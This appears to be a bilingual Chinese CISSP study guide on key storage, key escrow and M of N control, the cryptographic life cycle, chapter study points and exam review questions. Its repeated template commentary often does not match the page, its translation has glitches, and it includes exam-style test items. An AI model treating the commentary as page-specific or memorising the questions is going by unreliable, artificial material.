所谓的知识分割原则(本章前面已讨论过)。 当拥有密钥的用户离开组织或不再被允许访问由该密钥保护的材料时,必须更 改密钥,并使用新密钥重新加密所有加密材料。 在选择密钥存储机制时,您有三种主要选项可供选择: 基于软件的存储机制将密钥作为数字对象存储在使用的系统上。 例如,这 可能涉及将密钥存储在本地文件系统中。 更先进的基于软件的机制可能使 用专用应用程序来保护这些密钥,包括使用二次加密以防止未经授权访问 密钥。 基于软件的方法通常易于实现,但存在软件机制被攻破的风险。 基于硬件的存储机制是用于管理加密密钥的专用硬件设备。 这些设备可以 是个人设备,例如存储个人使用的密钥的闪存驱动器或智能卡,也可以是 企业设备,称为硬件安全模块(HSM),用于管理组织的密钥。 硬件方法 比软件方法更复杂且成本更高,但提供了更高的安全性。 基于云的存储机制采用HSM方法,并在云服务提供商的数据中心中实现。 主要的云服务提供商,包括AWS和Microsoft,提供HSM解决方案以实 现安全的密钥管理。 密钥托管与恢复 密码学是一种强大的工具。 与大多数工具一样,它可以用于多种有益的目的, 但也可能被用于恶意意图。

为了应对密码技术的爆炸式增长,世界各国政府提 出了实施密钥托管系统的设想。 这些系统允许政府在有限的情况下(例如法院 命令)从中央存储设施中获取特定通信所使用的密码密钥。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P416

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Two major approaches to key escrow have been proposed over the past decade: Fair Cryptosystems In this escrow approach, the secret keys used in a communication are divided into two or more pieces, each of which is given to an independent third party. Each of these pieces is useless on its own, but they may be recombined to obtain the secret key. When the government obtains legal authority to access a particular key, it provides evidence of the court order to each of the third parties and then reassembles the secret key. Escrowed Encryption Standard This escrow approach provides the government or another authorized agent with a technological means to decrypt ciphertext.

It was the approach proposed for the Clipper chip. It's highly unlikely that government regulators will ever overcome the legal and privacy hurdles necessary to implement key escrow on a widespread basis. The technology is certainly available, but the general public will likely never accept the potential government intrusiveness it facilitates. There are, however, legitimate uses for key escrow within an organization. Key escrow and recovery mechanisms prove useful when an individual leaves the organization and other employees require access to their encrypted data, or when a key is simply lost.

In these approaches, key recovery agents (RAs) have the ability to recover the encryption keys assigned to individual users. This is, of course, an extremely powerful privilege, as an RA could gain access to any user's encryption key. For this reason, many organizations choose to adopt a mechanism known as M of N control for key recovery. In this approach, there is a group of individuals of size N in an organization who are granted RA privileges. If they wish to recover an encryption key, a subset of at least M of them must agree to do so.

For example, in an M-of-N control system where M=3 and N=12, there are 12 authorized recovery agents, of whom 3 must collaborate to retrieve an encryption key. Cryptographic Life Cycle With the exception of the one-time pad, all cryptographic systems have a limited life span. Moore's law, a commonly cited trend in the advancement of computing power, states that the processing capabilities of a state-of-the-art microprocessor will double approximately every two years. This means that, eventually, processors will reach the amount of strength required to simply guess the encryption keys used for a communication.

中文直译 / 整理

在过去十年中,提出了两种主要的密钥托管方法: 公平的密码系统 在这种密钥托管方法中,通信中使用的秘密密钥被分成两个或 多个部分,每部分交给一个独立的第三方。 这些部分单独来看毫无用处,但可以 重新组合以获得秘密密钥。 当政府获得访问特定密钥的法律授权时,它会向每个 第三方提供法院命令的证据,然后重新组合秘密密钥。 托管加密标准 这种密钥托管方法为政府或其他授权代理提供了技术手段以 解密密文。 它正是为Clipper芯片所提出的方案。 政府监管机构几乎不可能克服在广泛范围内实施密钥托管所需的法律和隐私 障碍。 技术当然已经存在,但公众很可能永远不会接受其带来的潜在政府侵 入性。 然而,在组织内部,密钥托管具有合法的用途。 当员工离职而其他员工需要访 问其加密数据,或密钥不慎丢失时,密钥托管与恢复机制非常有用。 在这些方 法中,密钥恢复代理(RAs)具备恢复分配给各个用户的加密密钥的能力。 这 当然是一种极为强大的权限,因为恢复代理可以访问任何用户的加密密钥。 因 此,许多组织选择采用一种称为M出N控制的机制进行密钥恢复。 在这种方法中, 组织内有一组N个人被授予恢复代理权限。

如果他们希望恢复某个加密密钥, 则必须至少有M个人同意。 例如,在一个M=3 和N=12的M出N控制系统中,共 有12名授权恢复代理,其中必须有3人协作才能检索加密密钥。 加密生命周期 除了一次性密码本之外,所有加密系统都有一定的生命周期。 摩尔定律是描述 计算能力提升的常见趋势,指出最先进的微处理器的处理能力大约每两年翻一 番。 这意味着,最终处理器将具备足够的算力,能够直接猜出用于通信的加密 密钥。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 46 / PDF P417

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Security professionals must keep this cryptographic life cycle in mind when selecting an encryption algorithm and have appropriate governance controls in place to ensure that the algorithms, protocols, and key lengths selected are sufficient to preserve the integrity of a cryptosystem for however long it is necessary to keep the information it is protecting secret.

Security professionals can use the following algorithm and protocol governance controls: Specifying the cryptographic algorithms (such as AES and RSA) acceptable for use in an organization Identifying the acceptable key lengths for use with each algorithm based on the sensitivity of information transmitted Enumerating the secure transaction protocols (such as TLS) that may be used For example, if you're designing a cryptographic system to protect the security of business plans that you expect to execute next week, you don't need to worry about the theoretical risk that a processor capable of decrypting them might be developed a decade from now.

On the other hand, if you're protecting the confidentiality of information that could be used to construct a nuclear bomb, it's virtually certain that you'll still want that information to remain secret 10 years in the future! Summary Cryptographers and cryptanalysts are in a never-ending race to develop more secure cryptosystems and advanced cryptanalytic techniques designed to circumvent those systems. Cryptography dates back as early as Caesar and has been an ongoing topic of study for many years. In this chapter, you learned some of the fundamental concepts underlying the field of cryptography and gained a basic understanding of the terminology used by cryptographers.

This chapter also examined the similarities and differences between symmetric key cryptography (where communicating parties use the same key) and asymmetric key cryptography (where each communicator has a pair of public and private keys). You learned how hashing may be used to

中文直译 / 整理

安全专业人员在选择加密算法时,必须牢记这一加密生命周期,并实施适当的 治理控制措施,以确保所选择的算法、协议和密钥长度足以在需要保护信息保 密的整个期间内维持加密系统的完整性。 安全专业人员可以使用以下算法和协 议治理控制措施: Specifying the cr yptographic al gorithms (such as AES and RSA) 适用于组织使用 根据传输信息的敏感性,确定每种算法可接受的密钥长度 列出可能使用的安全事务协议(如 TLS) used 例如,如果您正在设计一个加密系统以保护您预计下周执行的商业计划的安全 性,您无需担心十年后可能开发出能够解密它们的处理器所带来的理论风险。 另一方面,如果您正在保护可能用于制造核弹的信息的机密性,那么几乎可以 肯定的是,您仍然希望这些信息在十年后保持秘密! 摘要 密码学家和密码分析学家一直在进行一场永无止境的竞争,以开发更安全的密 码系统和旨在规避这些系统的先进密码分析技术。 密码学可以追溯到凯撒时代,多年来一直是一个持续研究的主题。 在本章中, 您学习了密码学领域的一些基本概念,并对密码学家使用的术语有了基本了 解。

本章还探讨了对称密钥加密(通信双方使用相同密钥)与非对称密钥加密(每 位通信者拥有一对公钥和私钥)之间的相似性与差异。 您学习了如何使用哈希 来

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 47 / PDF P418

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

guarantee integrity and how hashes play a role in the digital signature process that guarantees nonrepudiation. We then analyzed some of the symmetric algorithms currently available and their strengths and weaknesses. We wrapped up the chapter by taking a look at the cryptographic life cycle and the role of algorithm/protocol governance in enterprise security. The next chapter expands this discussion to cover contemporary public key cryptographic algorithms. Additionally, some of the common cryptanalytic techniques used to defeat both types of cryptosystems will be explored. Study Essentials Understand the role that confidentiality, integrity, and nonrepudiation play in cryptosystems.

Confidentiality is one of the major goals of cryptography. It protects the secrecy of data while it is both at rest and in transit. Integrity provides the recipient of a message with the assurance that data was not altered (intentionally or unintentionally) between the time it was created and the time it was accessed. Nonrepudiation provides undeniable proof that the sender of a message actually authored it. It prevents the sender from subsequently denying that they sent the original message. Know how cryptosystems can be used to achieve authentication goals. Authentication provides assurances as to the identity of a user.

One possible scheme that uses authentication is the challenge-response protocol, in which the remote user is asked to encrypt a message using a key known only to the communicating parties. Authentication can be achieved with both symmetric and asymmetric cryptosystems. Be familiar with the basic terminology of cryptography. When a sender wants to transmit a private message to a recipient, the sender takes the plaintext (unencrypted) message and encrypts it using an algorithm and a key. This produces a ciphertext message that is transmitted to the recipient. The recipient then uses a similar algorithm and key to decrypt the ciphertext and re-create the original plaintext message for viewing.

Understand the difference between a code and a cipher and explain the basic types of ciphers. Codes are cryptographic systems of symbols that operate on words or phrases and are sometimes secret but don't always provide confidentiality. Ciphers, however, are always meant to hide the true

中文直译 / 整理

保证完整性,以及哈希在保证不可否认性性的数字签名过程中的作用。 随后,我们分析了当前可用的一些对称算法及其优缺点。 本章最后,我们考察 了密码生命周期以及算法/协议治理在企业安全中的作用。 下一章将扩展这一讨论,涵盖当代公钥加密算法。 此外,还将探讨用于破解 这两种加密系统的常见密码分析技术。 学习要点 理解机密性、完整性和不可否认性性在加密系统中的作用。 机密性是密码学的主要 目标之一。 它在数据处于静态和传输过程中保护其机密性。 完整性使消息接收方 确信,数据在创建到访问期间未被更改(无论是有意还是无意)。 不可否认性性提 供了不可否认性的证据,证明消息的发送者确实撰写了该消息,防止发送者事后否 认其发送了原始消息。 了解加密系统如何用于实现身份验证目标。 身份验证提供了对用户身份的保证。 一种可能的身份验证方案是挑战‑响应协议,其中远程用户被要求使用仅通信双 方知晓的密钥加密一条消息。 身份验证可通过对称和非对称加密系统实现。 熟悉密码学的基本术语。 当发送方希望向接收方传输一条私密消息时,发送方会 采用明文(未加密)消息,并使用某种算法和密钥对其进行加密,从而生成密文 消息并发送给接收方。

接收方随后使用类似的算法和密钥对密文进行解密,以还 原出原始的明文消息供查看。 理解代码与密码之间的区别,并解释密码的基本类型。 代码是作用于单词或短语 的符号加密系统,有时是保密的,但并不总是提供机密性。 然而,密码始终旨在 隐藏消息的真实

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 48 / PDF P419

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

meaning of a message. Know how the following types of ciphers work: transposition ciphers, substitution ciphers (including one-time pads), stream ciphers, and block ciphers. Know the requirements for successful use of a one-time pad. For a one-time pad to be successful, the key must be generated randomly without any known pattern. The key must be at least as long as the message to be encrypted. The pads must be protected against physical disclosure, and each pad must be used only one time and then discarded. Understand split knowledge. Split knowledge means that the information or privilege required to perform an operation is divided among multiple users.

This ensures that no single person has sufficient privileges to compromise the security of the environment. M of N Control is an example of split knowledge used in key recovery and other sensitive tasks. Understand work function (work factor). Work function, or work factor, is a way to measure the strength of a cryptography system by measuring the effort in terms of cost and/or time to decrypt messages. Usually, the time and effort required to perform a complete brute-force attack against an encryption system is what a work function rating represents. The security and protection offered by a cryptosystem is directly proportional to the value of its work function/factor.

Understand the importance of key security. Cryptographic keys provide the necessary element of secrecy to a cryptosystem. Modern cryptosystems utilize keys that are at least 128 bits long to provide adequate security. Know the differences between symmetric and asymmetric cryptosystems. Symmetric key cryptosystems (or secret key cryptosystems) rely on the use of a shared secret key. They are much faster than asymmetric algorithms, but they lack support for the following: scalability, easy key distribution, and nonrepudiation. Asymmetric cryptosystems use public-private key pairs for communication between parties but operate much more slowly than symmetric algorithms.

Be able to explain the basic operational modes of symmetric cryptosystems. Symmetric cryptosystems operate in several discrete modes, including Electronic Codebook (ECB) mode, Cipher Block Chaining (CBC) mode, Cipher Feedback (CFB) mode, Output Feedback (OFB) mode, Counter (CTR) mode, Galois/Counter mode (GCM), and Counter with Cipher Block Chaining Message Authentication Code mode (CCM). ECB mode is

中文直译 / 整理

含义。 了解以下类型的密码的工作原理:置换密码、替换密码(包括一次性密 码本)、流密码和分组密码。 了解一次性密码本成功使用的相关要求。 为使一次性密码本生效,密钥必须随 机生成,且不得含有任何已知模式。 密钥的长度必须至少与待加密的消息长度 相等。 密码本必须防止物理泄露,且每个密码本只能使用一次,之后必须销毁。 理解知识分割。 知识分割是指执行某项操作所需的信息或权限被分散给多个用户。 这确保了没有任何单个用户拥有足以破坏环境安全的足够权限。 M出N控制是知 识分割的一个示例,用于密钥恢复和其他敏感任务。 理解工作函数(工作因子)。 工作函数,或称工作因子,是一种通过衡量破解 消息所需的成本和/或时间来评估密码系统强度的方法。 通常,工作函数评级表 示对加密系统执行完整暴力破解所需的时间和努力。 密码系统的安全性和保护 能力与其工作函数/因子的值成正比。 理解密钥安全的重要性。 加密密钥为加密系统提供了必要的保密元素。 现代 加密系统使用至少128位长的密钥以提供足够的安全性。 了解对称加密系统与非对称加密系统之间的区别。 对称密钥加密系统(或秘密 密钥加密系统)依赖于共享密钥的使用。

它们比非对称算法快得多,但缺乏以 下支持:可扩展性、密钥分发的便捷性以及不可否认性性。 非对称加密系统使用 公钥‑私钥对进行通信,但其运行速度比对称算法慢得多。 能够解释对称密码系统的基本操作模式。 对称密码系统有多种离散的操作模式, 包括电子密码本(ECB)模式、密码分组链接(CBC)模式、密码反馈(CFB) 模式、输出反馈(OFB)模式、计数器(CTR)模式、伽罗瓦/计数器模式( GCM)以及计数器带密码分组链接消息认证码模式(CCM)。 ECB模式是

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 49 / PDF P420

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

considered the least secure and is used only for short messages. 3DES uses three iterations of DES with two or three different keys to increase the effective key strength to 112 or 168 bits, respectively. Know the Advanced Encryption Standard (AES). The Advanced Encryption Standard (AES) uses the Rijndael algorithm and is the U.S. government standard for the secure exchange of sensitive but unclassified data. AES uses key lengths of 128, 192, and 256 bits and a fixed block size of 128 bits to achieve a much higher level of security than that provided by the older DES algorithm. Written Lab 1.

What is the major obstacle preventing the widespread adoption of onetime pad cryptosystems to ensure data confidentiality? 2. Encrypt the message “I will pass the CISSP exam and become certified next month” using columnar transposition with the keyword SECURE. 3. Decrypt the message “F R Q J U D W X O D W L R Q V B R X J R W L W” using the Caesar ROT3 substitution cipher. Review Questions 1. Ryan is responsible for managing the cryptographic keys used by his organization. Which of the following statements are correct about how he should select and manage those keys? (Choose all that apply.) A.

Keys should be sufficiently long to protect against future attacks if the data is expected to remain sensitive. B. Keys should be chosen using an approach that generates them from a predictable pattern. C. Keys should be maintained indefinitely. D. Longer keys provide greater levels of security. 2. John recently received an email message from Bill. What cryptographic goal would need to be met to convince John that Bill was actually the sender of the message? A. Nonrepudiation

中文直译 / 整理

最不安全的,仅用于短消息。 3DES使用三次DES迭代,采用两个或三个不 同的密钥,分别将有效密钥强度提高到112位或168位。 了解高级加密标准(AES)。 高级加密标准(AES)使用Rijndael算法,是美 国政府用于安全交换敏感但非机密数据的标准。 AES使用128位、192位和256 位的密钥长度以及固定的128位分组大小,以比旧的DES算法提供更高的安全 性。 书面实验 1. 阻碍一次性密码本加密系统广泛采用以确保数据机密性的主要障碍是什么? 2. 使用关键词SECURE的列置换法加密消息“我将在下个月通过CISSP考试并 获得认证”。 3. 使用凯撒ROT3替换密码解密消息“F R Q J U D W X O D W L R Q V B R X J R W L W”。 复习题 1. Ryan 负责管理其组织使用的加密密钥。 以下关于他应如何选择和管理 这些密钥的陈述中,哪些是正确的? (可多选。 ) A. 如果数据预计仍需保持敏感,则密钥应足够长,以防范未来的攻击。 B. 密钥应通过可预测模式生成的方式进行选择。 C. 密钥应无限期保留。 D. 更长的密钥提供更高的安全级别。

2. John 最近收到了 Bill 发来的一封电子邮件。 要使 John 相信 Bill 确实 是该消息的发送者,需要满足哪一 cryptographic 目标? A. 不可否认性性

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 50 / PDF P421

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

B. Confidentiality C. Availability D. Integrity 3. You are implementing AES encryption for files that your organization plans to store in a cloud storage service and wish to have the strongest encryption possible. What key length should you choose? A. 192 bits B. 256 bits C. 512 bits D. 1,024 bits 4. You are creating a security product that must facilitate the exchange of symmetric encryption keys between two parties that have no way to securely exchange keys in person. What algorithm might you use to facilitate the exchange? A. Rijndael B. Blowfish C. Vernam D. Diffie–Hellman 5.

What occurs when the relationship between the plaintext and the key is complicated enough that an attacker can't merely continue altering the plaintext and analyzing the resulting ciphertext to determine the key? A. Confusion B. Transposition C. Polymorphism D. Diffusion 6. Randy is implementing an AES-based cryptosystem for use within his organization. He is planning to use it to ensure that only authorized individuals are able to read sensitive information. What goal of cryptogrpahy is Randy attempting to achieve? A. Nonrepudiation B. Confidentiality B.

中文直译 / 整理

机密性 C. 可用性 D. 完整性 3. 您正在为组织计划存储在云存储服务中的文件实施AES加密,并希望获 得最强的加密效果。 您应选择多长的密钥? A. 192 位 B. 256 位 C. 512 位 D. 1,024 位 4. 您正在创建一种安全产品,必须在两个无法亲自安全交换密钥的方之间 促进对称加密密钥的交换。 您可能会使用哪种算法来促进交换? A. Rijndael B. Blowfish C. Vernam D. Diffie–Hellman 5. 当明文与密钥之间的关系复杂到攻击者无法仅仅通过持续修改明文并分 析生成的密文来确定密钥时,会发生什么? A. 混淆 B. 置换 C. 多态性 D. 扩散 6. Randy 正在为其组织实现基于 AES 的加密系统。 他计划使用它来确保 只有授权人员能够读取敏感信息。 Randy 正在尝试实现密码学的哪个目 标? A. 不可否认性性 B. 机密性

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

